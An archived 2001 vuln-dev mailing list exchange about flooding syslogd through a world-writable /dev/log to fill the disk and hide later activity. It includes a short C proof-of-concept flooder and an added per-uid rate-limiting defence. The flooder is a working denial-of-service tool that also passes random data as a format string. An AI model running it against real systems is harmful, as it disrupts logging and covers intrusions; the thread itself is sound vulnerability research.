Well, that wouldn't work too well, as syslog likes to do "message repeating X number of times", so trying to fill it up would prove boring and pointless. But yeah, you could do it simply like this:

    #include <stdio.h>
    #include <syslog.h>

    main()
    {
        FILE *fp;
        char buffer[1024];

        printf("Starting Dos..\n");
        if((fp=fopen("/dev/urandom","r"))==NULL) {
            printf("Error Opening /dev/urandom\n");
            exit(0);
        }
        for(;;) {
            fgets(buffer,sizeof(buffer),fp);
            buffer[strlen(buffer)-1]='\0';
            syslog(0,buffer,strlen(buffer));
        }
    }

Something as simple as that works, but for some reason when I run it on my box it seems to exit after a while even though I capture all signals. Maybe syslog() has an exit() in the function; I can't be bothered looking into it. I did this code on the fly for proof of concept.

----- Original Message -----
From: Petr Baudis <paskyat_private>
To: <vuln-devat_private>
Sent: Thursday, October 04, 2001 6:09 AM
Subject: Possible syslogd DoS ?

> Hello,
> I just recently came on a thought (thanks to Marek Jaros) of possible
> DoS of syslogd. It uses /dev/log for receiving log messages, which has
> mode 0666 on most linuxes. It should be ok, as many non-root applications
> should be allowed to log things etc.
> But imagine that you will send a lot of very long messages there, different
> every time in order not to get stripped into kinda 'message repeated x times'.
> In this way, you can imho flood syslogd successfully, possibly filling whole
> partition where /var/log resides, regardless of your quota settings on
> the machine!
> Then, if /var/log is not on separate partition, the whole system can get
> into serious problems, and especially, further events won't be obviously
> logged, so you can do evil things there happily and nobody will know about it.
> Discussion? Something I didn't take into account? Possible solutions?
>
> --
>
> Petr "Pasky" Baudis
> .
> n = ((n >> 1) & 0x55555555) | ((n << 1) & 0xaaaaaaaa);
> n = ((n >> 2) & 0x33333333) | ((n << 2) & 0xcccccccc);
> n = ((n >> 4) & 0x0f0f0f0f) | ((n << 4) & 0xf0f0f0f0);
> n = ((n >> 8) & 0x00ff00ff) | ((n << 8) & 0xff00ff00);
> n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000);
> -- C code which reverses the bits in a word.
> .
> My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M-
> !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y?
> ------END GEEK CODE BLOCK------

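
On the "Possible solutions?" question in the quoted message: repeat-compression keys on message content, so a limit has to key on the sender instead. The token bucket below is an added example, not code from this thread or from any syslogd. It assumes the daemon can learn each sender's uid (on Linux, for instance, through SO_PASSCRED/SCM_CREDENTIALS on the /dev/log socket); BURST, RATE, MAX_UIDS and all function names are hypothetical.

```c
#include <stdio.h>

/* Hypothetical policy values, for illustration only. */
#define BURST    200   /* messages a sender may log back to back */
#define RATE     50    /* tokens refilled per second, per sender */
#define MAX_UIDS 64    /* size of the sender tracking table      */

struct bucket { unsigned uid; int used; long tokens; long last; };
static struct bucket table[MAX_UIDS];

/* Find or create the bucket for a sender uid; NULL when the table is full. */
static struct bucket *bucket_for(unsigned uid, long now)
{
    struct bucket *free_slot = NULL;
    for (int i = 0; i < MAX_UIDS; i++) {
        if (table[i].used && table[i].uid == uid) return &table[i];
        if (!table[i].used && !free_slot) free_slot = &table[i];
    }
    if (free_slot) *free_slot = (struct bucket){ uid, 1, BURST, now };
    return free_slot;
}

/* 1 = write the message, 0 = drop it. Message content is never inspected. */
int allow_message(unsigned uid, long now)
{
    struct bucket *b = bucket_for(uid, now);
    if (!b) return 0;                    /* table full: drop, do not exempt */
    if (now > b->last) {                 /* refill for the elapsed seconds  */
        b->tokens += (now - b->last) * RATE;
        if (b->tokens > BURST) b->tokens = BURST;
        b->last = now;
    }
    if (b->tokens <= 0) return 0;
    b->tokens--;
    return 1;
}

/* Constructed scenario: one sender offers n messages within second `now`. */
long accepted_in_burst(unsigned uid, long now, long n)
{
    long ok = 0;
    for (long i = 0; i < n; i++) ok += allow_message(uid, now);
    return ok;
}

int main(void)
{
    printf("flood from uid 1000: %ld of 100000 written\n", accepted_in_burst(1000, 0, 100000));
    return 0;
}
```

Because each uid has its own bucket, one account hitting its cap does not stop other senders from being logged, which addresses the concern that further events would go unrecorded.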
This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 08:29:06 PDT